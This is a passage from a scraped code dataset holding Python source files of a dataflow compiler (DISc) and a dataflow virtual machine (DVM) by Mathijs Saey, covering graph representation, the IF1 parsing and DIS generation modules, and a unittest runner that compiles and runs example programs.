program.\n#\n# \\param subGraphs\n#\t\tA list of subgraphs to compile.\n# \\param prog\n#\t\tThe DIS object to add the data to. \n##\ndef convertSubGraphs(subGraphs, prog):\n\tnodes = []\n\n\tdef nodeProc(node):\n\t\tif node.isCompound():\n\t\t\tcompoundConverter.convertNode(prog, node)\n\t\telse:\n\t\t\tnodeConverter.convertNode(prog, node)\n\t\tnodes.append(node)\n\n\tdef sgStart(sg):\n\t\tprog.addCommentLines(\"Starting subgraph %s\" % sg.name)\n\n\tdef sgStop(sg):\n\t\tprog.addNewlines()\n\n\t\tfor node in nodes:\n\t\t\tnodeConverter.addLinks(prog, node)\n\t\tfor node in nodes:\n\t\t\tnodeConverter.addLiterals(prog, node)\n\n\t\tprog.addCommentLines(\"Leaving subgraph %s\" % sg.name)\n\t\tprog.addNewlines()\n\n\t\tdel nodes[:]\n\n\tIGR.traverse(\n\t\tnodeProc, sgStart, sgStop, \n\t\tTrue, lambda x : None, lambda x : None,\n\t\tsubGraphs)\n\n##\n# Convert a collection of subGraphs\n# to a DIS program.\n#\n# \\param entryName\n#\t\tThe name of the entry point in the program.\n#\t\tThis subgraph will be linked to the entry and\n#\t\texit of the DVM program.\n##\ndef convert(entryName = 'main'):\n\tmain = IGR.getSubGraph(entryName).entry\n\tinputs = main.outputs\n\n\tif inputs == 0:\n\t\treturn \"TRIV <= %s\" % main.subGraph.value\n\n\tprog = dis.DIS(inputs)\n\tconvertSubGraphs(IGR.getSubGraphs(), prog)\n\n\t# Add an implicit call to main, which returns to the \n\t# program exit point.\n\tprog.addCommentLine(\"Implicit call to main\", 0)\n\tmainKey = prog.getToKey(main)\n\tmainCall = prog.addInstruction(0, 'CHN', [inputs, 1,mainKey[0], mainKey[1], 0, 1])\n\tprog.linkStart(mainCall)\n\n\treturn prog.generate()" }, { "alpha_fraction": 0.7277834415435791, "alphanum_fraction": 0.7291454076766968, "avg_line_length": 22.12598419189453, "blob_id": "a1bad1f2ce7deecca825b51a17676d1244b9b97f", "content_id": "b1aef37f673f53fe42e6bc77962b1d67795ad8ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5874, "license_type": "no_license", "max_line_length": 79, "num_lines": 254, "path": "/DVM/core/__init__.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# __init__.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core\n# \\brief Dataflow Virtual Machine\n# \n# This is the core of DVM. It contains the code that is necessary\n# to execute the program in instruction memory.\n#\n# This top level namespace also declares some convenience functions\n# to control the instruction memory and runtime.\n##\n\nimport instruction\nimport runtime\nimport memory\n\n##\n# Create an instruction and add it to memory.\n# \n# \\param constructor\n#\t\tThe instruction constructor\n# \\param argLst\n#\t\tThe arguments to pass to the constructor.\n#\t\tThe exact sructure of this list depends on the\n#\t\tinstruction type.\n#\n# \\return \n#\t\tThe key of the newly added instruction.\n##\ndef _addInstruction(constructor, argLst = []):\n\tinst = constructor(*argLst)\n\treturn memory.add(inst)\n\n## \n# Add an operation instruction.\n#\n# \\param op\n#\t\tThe operation of this instruction.\n# \\param inputs\n#\t\tThe amount of inputs this instruction\n#\t\twill accept.\n#\n# \\return\n#\t\tThe key of the operation instruction.\n##\ndef addOperationInstruction(op, inputs):\n\treturn _addInstruction(\n\t\tinstruction.OperationInstruction,\n\t\t[op, inputs])\n\n##\n# Add a constant instruction.\n#\n# \\param value\n#\t\tThe value the constant should return.\n#\n# \\return \n#\t\tThe key of the constant instruction.\n## \ndef addConstant(value):\n\treturn _addInstruction(instruction.Constant, [value])\n\n##\n# Add a sink instruction.\n#\n# \\return\n#\t\tThe key of the sink instruction.\n##\ndef addSink():\n\treturn _addInstruction(instruction.Sink)\n\n##\n# Create a switch instruction.\n# \n# \\param dstList\n#\t\tThe list of the possible destinations.\n#\n# \\return \n#\t\tThe key of the switch instruction.\n##\ndef addSwitch(dstList):\n\treturn _addInstruction(instruction.Switch, [dstList])\n\n##\n# Add a context change instruction.\n#\n# \\param binds\n#\t\tThe amount of tokens to bind to a new\n#\t\tcontext.\n# \\param restores\n#\t\tThe amount of tokens the context will\n#\t\tproduce before being deleted.\n# \\param destSink\n#\t\tThe destination of the token after\n#\t\tthe context change.\n# \\param retSink\n#\t\tThe destination of the token\n#\t\tafter the context restore.\n#\n# \\return \n#\t\tThe key of the context change instruction.\n##\ndef addContextChange(binds, restores, destSink, retSink):\n\treturn _addInstruction(\n\t\tinstruction.ContextChange,\n\t\t[binds, restores, destSink, retSink])\n\n##\n# Add a split instruction.\n#\n# \\param binds\n#\t\tThe amount of inputs that the split will take.\n#\t\tA split should always take at least one argument,\n#\t\twhich is the array that will be split.\n# \\param dest\n#\t\tThe destination of the tokens after\n#\t\tthe context change.\n# \\param merge\n#\t\tThe instruction that will recreate\n#\t\tthe array after the contextrestore.\n# \\return\n#\t\tThe key of the context map instruction.\n##\ndef addSplit(binds, dest, merge):\n\treturn _addInstruction(\n\t\tinstruction.Split,\n\t\t[binds, dest, merge])\n\n##\n# Add a context restore instruction.\n#\n# \\return \n#\t\tThe key of the context restore instruction.\n##\ndef addContextRestore():\n\treturn _addInstruction(instruction.ContextRestore)\n\n##\n# Add a stop instruction.\n#\n# \\return\n#\t\tThe key of the stop instruction.\n##\ndef addStopInstruction():\n\treturn _addInstruction(instruction.StopInstruction)\n\n##\n# Add a destination to a given instruction.\n#\n# This only works on instruction::OperationInstruction \n# and on instruction::Sink\n#\n# \\param srcKey\n#\t\tThe key of the from instruction.\n# \\param srcPort\n#\t\tThe index of the from port.\n# \\param dstKey\n#\t\tThe key of the destination instruction.\n# \\param dstPort\n#\t\tThe index of the destination port.\n##\ndef addDestination(srcKey, srcPort, dstKey, dstPort):\n\tinst = memory.get(srcKey)\n\tinst.addDestination(srcPort, dstKey, dstPort)\n\n##\n# Add a literal to a given instruction.\n#\n# This only works on instruction::OperationInstruction\n# and on instruction:ContextChangeInstruction\n##\ndef addLiteral(key, port, val):\n\tinst = memory.get(key)\n\tinst.addLiteral(port, val)\n\n##\n# Start the execution cores.\n#\n# \\see runtime::init()\n##\ndef start(cores): runtime.start(cores)\n\n##\n# Add an external token containing data.\n#\n# \\see runtime::addData()\n##\ndef addData(data): runtime.addData(data)\n\n##\n# Add data to the core, that immediately \n# adds a stop token containing data.\n#\n# This can be used if the program does not require\n# any user input. \n#\n# \\see runtime::addTrivial()\n##\ndef addTrivial(data): runtime.addTrivial(data)\n\n##\n# Check the current port of the runtime.\n##\ndef getPort():\n\treturn runtime.__port__\n\n##\n# Return the amount of input the\n# runtime requires.\n##\ndef getIn():\n\treturn runtime.__in__\n\n##\n# Set the amount of inputs that the \n# runtime expects.\n##\ndef setIn(i):\n\truntime.__in__ = i\n\n##\n# See if the runtime expects additional input.\n#\n# \\return\n# \t\tTrue if the runtime has received all the\n#\t\trequired data.\n##\ndef hasIn(): \n\treturn getPort() >= getIn()\n" }, { "alpha_fraction": 0.3483572006225586, "alphanum_fraction": 0.5425442457199097, "avg_line_length": 31.094594955444336, "blob_id": "7a562b1ebdbf315de906e7f2a4bc9d52fb29dedc", "content_id": "e4ae243dc1b2c5baead7d797845e7af7b1461638", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2374, "license_type": "no_license", "max_line_length": 85, "num_lines": 74, "path": "/test/run.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# run.py\n# Mathijs Saey\n# DVM tests\n\n# This file compiles and runs the various example files\n\nimport unittest\nimport subprocess\n\nDVM_PATH = \"../DVM/dvm.py\"\nDISC_PATH = \"../DISc/disc.py\"\n\nclass Test(unittest.TestCase):\n\n\tdef compile(self, path):\n\t\tprint \"Compiling\", path\n\t\tsubprocess.check_call([DISC_PATH, path, '-d', DVM_PATH, '-ll', '40'])\n\n\tdef runDvm(self, path, inputs):\n\t\tprint \"Running\", path\n\t\targs = [DVM_PATH, path, '-ll', '40']\n\n\t\tfor e in inputs:\n\t\t\targs.append(\"-i\")\n\t\t\targs.append(str(e))\n\n\t\treturn subprocess.check_output(args).strip()\n\n\tdef abstract(self, name, inputs, expected):\n\t\tself.compile(name + '.sis')\n\t\tres = self.runDvm(name + '.dis', inputs)\n\t\tself.assertEqual(res, expected)\n\n\tdef test_fac(self): self.abstract('factorial', ['5'], '120')\n\tdef test_fib(self): self.abstract('fibonacci', ['10'], '55')\n\tdef test_call(self): self.abstract('call', ['1', '2'], '21')\n\tdef test_simple(self): self.abstract('simple', ['1', '2', '3', '4'], '10')\n\tdef test_trivial(self): self.abstract('trivial', [], '8')\n\tdef test_forin(self): self.abstract('forin', \n\t\t['5', '10', '[5, 10, 30, 3, 40]', '[4, 20, 5]'],\n\t\t'[13, 11, 12, 13, 12, 45, 55, 35, 20, 21, 22, 23, 24, 25]')\n\n\tdef test_sort(self): self.abstract('sort',\n\t\t[('['\n\t\t\t'50, 92, 29, 63, 88, 3, 33, 49, 52, 27, 32, 86, 73, 97, 100, 49, 37, 86, 87, 76,'\n\t\t\t'50, 51, 95, 14, 89, 35, 39, 6, 93, 61, 55, 15, 12, 35, 39, 45, 24, 20, 19, 34,'\n\t\t\t'33, 39, 75, 80, 33, 41, 8, 89, 37, 99, 23, 69, 21, 98, 16, 91, 64, 40, 89, 67,'\n\t\t\t'91, 13, 18, 3, 42, 69, 75, 42, 12, 48, 53, 58, 8, 57, 70, 97, 11, 1, 74, 71,'\n\t\t\t'78, 57,28, 100, 46, 9, 4, 96, 91, 18, 32, 1, 86, 80, 81, 55, 3, 20, 60, 91,'\n\t\t\t']')],\n\t\t('['\n\t\t\t'1, 1, 3, 3, 3, 4, 6, 8, 8, 9, 11, 12, 12, 13, 14, 15, 16, 18, 18, 19, '\n\t\t\t'20, 20, 21, 23, 24, 27, 28, 29, 32, 32, 33, 33, 33, 34, 35, 35, 37, 37, 39, 39, '\n\t\t\t'39, 40, 41, 42, 42, 45, 46, 48, 49, 49, 50, 50, 51, 52, 53, 55, 55, 57, 57, 58, '\n\t\t\t'60, 61, 63, 64, 67, 69, 69, 70, 71, 73, 74, 75, 75, 76, 78, 80, 80, 81, 86, 86, '\n\t\t\t'86, 87, 88, 89, 89, 89, 91, 91, 91, 91, 92, 93, 95, 96, 97, 97, 98, 99, 100, 100'\n\t\t']'))\n\n\tdef test_select(self): \n\t\tself.compile('select.sis')\n\n\t\tin_out = [\n\t\t\t(['5', '2'], '3'),\n\t\t\t(['0', '2'], '4'),\n\t\t\t(['1', '2'], '3')\n\t\t]\n\n\t\tfor pair in in_out:\n\t\t\tres = self.runDvm('select.dis', pair[0])\n\t\t\tself.assertEqual(res, pair[1])\n\nunittest.main()" }, { "alpha_fraction": 0.7194267511367798, "alphanum_fraction": 0.7213375568389893, "avg_line_length": 23.344961166381836, "blob_id": "18f4411a9903965771bd9fb2f7156c1e426c6d6a", "content_id": "0541444d973de0aa1eb0decb510dd6812db9a04d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6280, "license_type": "no_license", "max_line_length": 79, "num_lines": 258, "path": "/DISc/IGR/__init__.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# __init__.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package IGR\n# \\author Mathijs Saey\n# \n# \\brief DVM Intermediate Graph Representation\n#\n# This python module contains the DVM intermediate form, called \n# Intermediate Graph Representation (IGR).\n#\n# The general idea behind IGR is that it doesn't know anything about the\n# outside world. It is only a graph representation that can be modified by\n# both the front and the backend. However, IGR should not depend on either\n# the front or backend, instead, IGR should be rich enough to work with \n# a variety of front and backends.\n# \n# This module should be considerd a stable frontend of the module,\n# external modules (such as parsers) should only use these functions\n# to create and modify the IGR.\n#\n# This module also exports 2 functions, dot::dot() and traverse::traverse()\n##\n\nimport node\nimport graph\nimport literal\nimport subgraph\n\nfrom dot import dot\nfrom traverse import traverse\n\n# ----- #\n# Graph #\n# ----- #\n## \\name Graph\n## \\{\n\n##\n# Get a list of all the non-compound subgraphs\n# in the program.\n#\n# \\return \n#\t \tAll the non compound subgraphs in the program.\n## \ndef getSubGraphs(): \n\treturn graph.getSubGraphs()\n\n##\n# Get a subgraph by name.\n#\n# \\param name\n#\t\tThe name of the subgraph \n# \t\twe want to retrieve.\n# \\return\n#\t\tThe subgraph\n##\n\ndef getSubGraph(name):\n\treturn graph.getSubGraph(name)\n\n##\n# Remove a subgraph from the program.\n# This only works for subgraphs that are\n# not a part of a compound node.\n# Care should be taken to avoid calling this method\n# while iterating over the subgraph list.\n#\n# \\param subGraph\n#\t\tA reference to the subgraph to remove.\n##\ndef removeSubGraph(subGraph):\n\tgraph.removeSubGraph(subGraph)\n\n##\\}\n\n# --------- #\n# SubGraphs #\n# --------- #\n## \\name Subgraphs\n## \\{\n\n##\n# Create a new subgraph\n#\n# \\param inputs\n#\t\tThe amount of inputs the subgraph accepts\n# \\param outputs\n# \t\tThe amount of data the subgraph returns\n# \\return\n# \t\tThe subgraph. It's entry and exit fields\n#\t\tshould be used to access parameters and\n#\t\treturn values of this subgraph.\n#\ndef createGeneralSubGraph(name , inputs, outputs, isFunc):\n\tsubGraph = subgraph.SubGraph(None, None, name, isFunc)\n\tentry = node.SubGraphEntryNode(subGraph, inputs)\n\texit = node.SubGraphExitNode(subGraph, outputs)\n\tsubGraph.entry = entry\n\tsubGraph.exit = exit\n\tsubGraph.addNode(entry)\n\tsubGraph.addNode(exit)\n\treturn subGraph\n\n##\n# Create a subgraph and add it to the program graph.\n##\ndef createSubGraph(name, inputs, outputs):\n\tsubGraph = createGeneralSubGraph(name, inputs, outputs, True)\n\tgraph.addSubGraph(subGraph)\n\tgraph.bindName(subGraph)\n\treturn subGraph\n \n##\n# Create a subgraph for a compound node.\n##\ndef createCompoundSubGraph():\n\treturn createGeneralSubGraph(None, 0, 0, False)\n\n##\\}\n\n# ----- #\n# Nodes #\n# ----- #\n## \\name Nodes\n## \\{\n\n##\n# Create a node, add it to it's subgraph\n# and return it.\n#\n# \\param constructor\n#\t\tThe constructor to create the node.\n# \\param subGraph\n#\t\tThe subgraph that contains this node.\n# \\param arguments\n#\t\tThe arguments to pass to the constructor\n#\t\t(not including the subgraph)\n##\ndef createNode(constructor, subGraph, arguments = []):\n\targs = [subGraph] + arguments\n\tnode = constructor(*args)\n\tsubGraph.addNode(node)\n\treturn node\n\n##\n# Create an operation node\n#\n# \\param subGraph\n#\t\tThe subGraph that this node is part of\n#\n# \\param operation\n#\t\tThe operation that this node performs\n##\ndef createOperationNode(subGraph, operation):\n\treturn createNode(node.OperationNode, subGraph, [operation])\n\n##\n# Create a Compound node\n#\n# \\param type\n#\t\tThe type of the compound node (e.g. forAll)\n# \\param subGraph\n#\t\tThe subgraph this node belongs too\n# \\param subGraphss\n#\t\tThe subgraphs that are part of this compound node\n##\ndef createCompoundNode(type, subGraph, subGraphs):\n\treturn createNode(node.CompoundNode, subGraph, [type, subGraphs])\n\n##\n# Create a call node.\n#\n# \\param subGraph\n# \t\tthe subgraph this node belongs to\n# \\param inputs\n#\t\tthe amount of inputs this \n##\ndef createCallNode(subGraph, function):\n\treturn createNode(node.CallNode, subGraph, [function])\n\n##\n# Create a constant node.\n#\n# \\param subGraph\n#\t\tThe subgraph this node belongs to\n# \\param value\n#\t\tThe value of this subgraph\n##\ndef createConstantNode(subGraph, value):\n\treturn createNode(node.ConstantNode, subGraph, [value])\n\n##\\}\n\n# ---------------- #\n# Edges & Literals #\n# ---------------- #\n## \\name Edges and Literals\n## \\{\n\n##\n# Add a literal to a port.\n#\n# \\param value\n#\t\tThe value of the literal\n# \\param dstNode\n#\t\tThe node that the literal targets\n# \\param dstPort\n#\t\tThe idx of the port on this node\n##\ndef addLiteral(value, dstNode, dstPort):\n\tdest = dstNode.getInputPort(dstPort)\n\tlit = literal.Literal(value, dest)\n\tdest.attach(lit)\n\n##\n# Connect 2 ports with an implicit edge.\n#\n# \\param srcNode\n#\t\tThe node that provides data\n# \\param srcPort\n#\t\tThe idx of the output port on src\n# \\param dstNode\n#\t\tThe node that accepts the data\n# \\param dstPort\n#\t\tThe idx of the port on dst that accepts the data.\n##\ndef connect(srcNode, srcPort, dstNode, dstPort):\n\tsrcP = srcNode.getOutputPort(srcPort)\n\tdstP = dstNode.getInputPort(dstPort)\n\tsrcP.addTarget(dstP)\n\tdstP.attach(srcP)\n\n## \\}" }, { "alpha_fraction": 0.6928867101669312, "alphanum_fraction": 0.6996612548828125, "avg_line_length": 24.075471878051758, "blob_id": "01eeea58397384a1681988c93faf25b0fa622995", "content_id": "ae726e82273b34980a5eedb6a8b25e5a43d705c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2657, "license_type": "no_license", "max_line_length": 79, "num_lines": 106, "path": "/DISc/frontEnd/IF1/__init__.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# __init__.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package frontEnd.IF1\n# \\author Mathijs Saey\n# \n# \\brief DISc IF1 Parser.\n#\n# This module parses [IF1](\\ref IF1) files and converts them to IGR.\n##\n\nimport type\nimport edge\nimport graph\nimport converter\n\nimport logging\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.WARNING)\n\n# ------ #\n# Parser #\n# ------ #\n\n## Skip a line #\ndef skipLine(str, ctr): pass\n\n##\n# Parser values and the function to call when\n# they are encountered\n##\n__FUNCTIONS__ = {\n\t'C' : skipLine,\n\t'T' : type.parseType,\n\t'E' : edge.parseEdge,\n\t'L' : edge.parseLiteral,\n\t'N' : graph.parseNode,\n\t'G' : graph.parseGraph,\n\t'X' : graph.parseGraph,\n\t'{' : graph.parseCompoundStart,\n\t'}' : graph.parseCompoundEnd\n}\n\n##\n# Parse a single if1 line.\n#\n# \\param line\n#\t\tThe string of the line to parse\n# \\param ctr\n#\t\tThe line number of the current line,\n#\t\tused for error handling.\n##\ndef parseLine(line, ctr = \"?\"):\n\tlog.debug(\"Parsing line: %s\", line)\n\tarr = line.split()\n\tkey = line[0]\n\ttry:\n\t\tfunc = __FUNCTIONS__[key]\n\texcept KeyError:\n\t\tlog.warning(\"Line %d, Unrecognized line type: %s\", ctr, key)\n\texcept Exception, e:\n\t\tlog.error(\"Line %d, Exception %s while parsing: '%s'\". ctr, e, line)\n\telse:\n\t\tfunc(arr, ctr)\n\n##\n# Parse a complete IF1 string.\n# This function simply splits the file \n# based on the newlines and passes each\n# line to parseLine()\n#\n# \\param str\n#\t\tThe string\n##\ndef fromString(str):\n\tctr = 1\n\tlines = str.split(\"\\n\")\n\tfor line in lines:\n\t\tif len(line) is not 0:\n\t\t\tparseLine(line, ctr)\n\t\t\tctr += 1\n\tconverter.run()" }, { "alpha_fraction": 0.6946734189987183, "alphanum_fraction": 0.698478102684021, "avg_line_length": 28.203702926635742, "blob_id": "e4bb851e4dfe9f0b68d0ee897f930f509abeb812", "content_id": "8953f5c59f9330798d147e0aab43b11b3e07f226", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3154, "license_type": "no_license", "max_line_length": 85, "num_lines": 108, "path": "/DVM/core/token.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# token.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core.token\n# \\brief DVM Tagged tokens\n# \n# This module defines the various tokens that \n# carry the state of the program.\n##\n\n##\n# Represents a DVM token.\n# A token carries program data and a Tag.\n# The tag contains all the \"meta\" information about\n# the token, such as it's destination and context.\n##\nclass Token(object):\n\tdef __init__(self, datum, tag):\n\t\tsuper(Token, self).__init__()\n\t\tself.datum = datum\n\t\tself.tag = tag\n\n\tdef __str__(self):\n\t\ttagString = \"[\" + str(self.tag) + \"]\"\n\t\tdataString = \"'\" + str(self.datum) + \"'\"\n\t\treturn \"<| \" + dataString + \" \" + tagString + \" |>\"\n\n##\n# Represents a tag.\n# A tag contains the meta information about\n# a token.\n##\nclass AbstractTag(object):\n\tdef isStop(self):\n\t\traise NotImplementedError(\"Abstract method\")\n\n##\n# Standard tag.\n# A standard tag contains the destination\n# (instruction and port) of a token as well as it's context.\n#\n# Conceptually, a tag has 2 parts:\n# * A static part, it's port and instruction which are part of the program\n# * A dynamic part, it's core and context, which are dynamically assigned at runtime.\n##\nclass Tag(AbstractTag):\n\tdef __init__(self, inst, port, cont):\n\t\tsuper(AbstractTag, self).__init__()\n\t\tself.cont = cont\n\t\tself.port = port\n\t\tself.inst = inst\n\n\tdef __str__(self):\n\t\tinst = \"inst \" + str(self.inst)\n\t\tport = \"port \" + str(self.port)\n\t\tcont = \"cont \" + str(self.cont) \n\t\treturn \"%s | %s | %s \" % (inst, port, cont)\n\n\tdef isStop(self): return False\n\n##\n# External Tag\n#\n# Represent a token with data from the user.\n# Internally, this is just a token with a predetermined\n# destination.\n##\nclass ExternalTag(Tag):\n\tdef __init__(self, port):\n\t\tsuper(ExternalTag, self).__init__((0,0), port, -1)\n##\n# Stop Tag\n#\n# Signals the end of program execution.\n##\nclass StopTag(AbstractTag):\n\tdef __init__(self):\n\t\tsuper(AbstractTag, self).__init__()\n\t\tself.init = True\n\n\tdef __str__(self): return \"<STOP>\"\n\tdef notify(self): self.init = False\n\tdef isInit(self): return self.init\n\tdef isStop(self): return True\n" }, { "alpha_fraction": 0.6684526205062866, "alphanum_fraction": 0.6736828684806824, "avg_line_length": 24.704917907714844, "blob_id": "136a01ff6e3f99702953845e178f5756b1ded4ff", "content_id": "bc18cbc57fbbb4c2629f90b9d1b85406ba4ddcd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7839, "license_type": "no_license", "max_line_length": 79, "num_lines": 305, "path": "/DISc/backEnd/DVM/dis.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# dis.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package backEnd.DVM.dis\n# \\brief dis writer\n#\n# This module contains an API that allows us to write\n# DIS files. \n##\n\nimport StringIO\n\nDVM_CHUNKS = 2\n\n##\n# This class collects the necessary data\n# to generate a DIS string.\n#\n# It's goal is to facilitate the creation of DIS,\n# by containing the necessary strings while doing necessary\n# bookkeeping such as keys. It also allows us to generate a tidier\n# DIS string by arranging the strings per chunk before printing.\n##\nclass DIS(object):\n\n\t##\n\t# Create a DIS object.\n\t# This automatically calls addPredefined()\n\t#\n\t# \\param inputs\n\t#\t\tThe amount of inputs the program will accept.\n\t##\n\tdef __init__(self, inputs):\n\t\tsuper(DIS, self).__init__()\n\n\t\t## Stores the node -> (chunk, inst) mapping\n\t\tself.nodes = {}\n\n\t\t## Stores the strings per chunk\n\t\tself.memory = [[] for i in xrange(0, DVM_CHUNKS)]\n\n\t\t## Contains the current key per chunk\n\t\tself.keys = [0 for i in xrange(0, DVM_CHUNKS)]\n\n\t\t## \n\t\t# Contains the context changes that do not known\n\t\t# their destination sinks yet.\n\t\t##\n\t\tself.callMap = {}\n\n\t\tself.chunks = DVM_CHUNKS\n\t\tself.inputs = inputs\n\t\tself.indent = 0\n\n\t\tself.addPredefined(inputs)\n\n\t## Add the standard statements to DIS.\n\tdef addPredefined(self, inputs):\n\t\tself.addCommentLine(\"Program entry and exit point\", 0)\n\t\tself.addInstruction(0, 'BGN', [inputs])\n\t\tself.addInstruction(0, 'STP', [])\n\t\tself.addNewline(0)\n\n\t## \n\t# Link a node to a key pair.\n\t#\n\t# We store the source and destination keys\n\t# separately for nodes that are converted to multiple\n\t# instructions.\n\t#\n\t# \\param node\n\t#\t\tThe node to associate with the keys\n\t# \\param toKey\n\t#\t\tThe key if you want to link from a different node\n\t#\t\t__to__ this node, in other words, when this node is the \n\t#\t\tdestination.\n\t# \\param fromKey\n\t#\t\tThe key if you want to link __from__ this node,\n\t#\t\tin other words, when this node is the source.\n\t##\n\tdef linkNode(self, node, toKey, fromKey):\n\t\tself.nodes.update({node.key : (fromKey, toKey)})\n\n\t\tif node.key in 